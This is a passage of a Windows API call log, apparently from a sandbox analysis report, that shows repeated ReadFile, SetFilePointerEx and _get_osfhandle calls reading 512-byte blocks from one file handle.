hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.617] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.617] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.617] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.617] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.618] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.618] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.618] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.618] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.618] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.618] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.618] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.618] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.618] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.618] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.618] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.618] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.618] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.618] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.618] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.618] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.618] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.618] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.618] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.619] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.619] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.619] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.619] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.619] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.619] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.619] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.619] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.619] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.619] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.619] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.619] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.619] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.619] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.619] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.619] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.619] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.619] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.619] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.620] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.620] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.620] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.620] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.620] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.620] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.620] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.620] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.620] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.620] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.620] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.620] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.620] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.620] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.620] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.620] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.620] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.620] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.620] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.620] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.621] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.621] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.621] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.621] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.621] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.621] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.621] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.621] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.621] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.621] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.621] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.621] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.621] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.621] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.621] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.621] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.622] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.622] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.622] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.622] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.622] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.622] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.622] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.622] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.622] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.622] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.622] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.622] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.622] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.622] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.622] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.622] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.623] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.623] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.623] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.623] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.623] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.623] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.623] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.623] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.623] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.623] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.623] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.623] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.623] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.623] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.623] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.623] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.624] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.624] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.624] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.624] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.624] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.624] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.624] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.624] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.624] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.624] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.624] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.624] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.624] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.624] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.624] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.624] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.625] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.625] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.625] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.625] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.625] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.625] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.625] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.625] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.625] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.625] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.625] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.625] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.625] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.625] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.625] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.625] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.625] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.625] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.625] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.626] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.626] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.626] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.626] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.626] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.626] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.626] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.626] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.626] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.626] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.626] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.626] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.626] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.626] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.626] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.626] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.626] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.626] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.626] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.626] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.627] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.627] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.627] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, 